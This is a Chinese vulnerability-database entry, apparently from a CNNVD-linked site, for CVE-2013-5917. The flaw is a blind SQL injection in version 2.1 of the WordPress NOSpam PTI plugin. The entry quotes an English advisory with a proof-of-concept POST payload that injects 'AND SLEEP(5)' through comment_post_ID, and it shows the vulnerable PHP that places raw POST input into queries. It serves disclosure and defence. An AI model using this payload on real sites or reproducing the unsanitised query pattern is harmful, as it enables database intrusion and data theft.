WordPress NOSpam PTI插件‘comment_post_ID’参数SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1121875 漏洞类型 SQL注入
发布时间 2013-09-23 更新时间 2013-09-23
CVE编号 CVE-2013-5917 CNNVD-ID CNNVD-201309-388
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/28485
https://www.securityfocus.com/bid/62580
https://cxsecurity.com/issue/WLB-2013090148
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201309-388
|漏洞详情
WordPress是WordPress软件基金会的一套使用PHP语言开发的博客平台,该平台支持在PHP和MySQL的服务器上架设个人博客网站。NOSpamPTI是其中的一个消除垃圾邮件插件。WordPress的NOSpamPTI插件2.1版本中的wp-comments-post.php脚本中存在SQL注入漏洞。远程攻击者可借助‘comment_post_ID’参数利用该漏洞执行任意SQL命令。
|漏洞EXP
[ NOSpamPTI Wordpress plugin Blind SQL Injection ]

[ Vendor product description ]

NOSpamPTI eliminates the spam in your comment box so strong and free,
developed from the idea of Nando Vieira <a href="http://bit.ly/d38gB8"
rel="nofollow">http://bit.ly/d38gB8</a>, but some themes do not support
changes to the functions.php to this we alter this function and
available as a plugin. Make good use of this plugin and forget all the Spam.

[ Bug Description ]

NOSpamPTI contains a flaw that may allow an attacker to carry out a
Blind SQL injection attack. The issue is due to the wp-comments-post.php
script not properly sanitizing the comment_post_ID in POST data. This
may allow an attacker to inject or manipulate SQL queries in the
back-end database, allowing for the manipulation or disclosure of
arbitrary data.

[ History ]

Advisory sent to vendor on 09/09/2013
Vendor reply 09/20/2013. According the vendor, the plugin was deprecated.

[ Impact ]

HIGH

[ Afected Version ]

2.1

[ CVE Reference]

CVE-2013-5917

[ POC ]

Payload:
POST /wordpress/wp-comments-post.php

author=1&challenge=1&challenge_hash=e4da3b7fbbce2345d7772b0674a318d5&comment=1&comment_parent=0&comment_post_ID=1
AND SLEEP(5)&email=sample@email.tst&submit=Post Comment&url=1

[ Vulnerable code ]

$post_id = $_POST['comment_post_ID'];

load_plugin_textdomain('nospampti',
WP_PLUGIN_URL.'/nospampti/languages/', 'nospampti/languages/');

    if ($hash != $challenge) {
        $wpdb->query("DELETE FROM {$wpdb->comments} WHERE comment_ID =
{$comment_id}");
        $count = $wpdb->get_var("select count(*) from $wpdb->comments
where comment_post_id = {$post_id} and comment_approved = '1'");


[ Reference ]

[1] No SpamPTI SVN repository -
http://plugins.svn.wordpress.org/nospampti/trunk/nospampti.php
[2] Owasp - https://owasp.org/index.php/SQL_Injection
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/

--------------------------------------------
iBliss Segurança e Inteligência - Sponsor: Alexandro Silva - Alexos
|参考资料

来源:BUGTRAQ
名称:20130920[iBlissSecurityAdvisory]BlindSQLinjectionvulnerabilityinNOSpamPTIwordpressplugin
链接:http://archives.neohapsis.com/archives/bugtraq/2013-09/0102.html
来源:BID
名称:62580
链接:http://www.securityfocus.com/bid/62580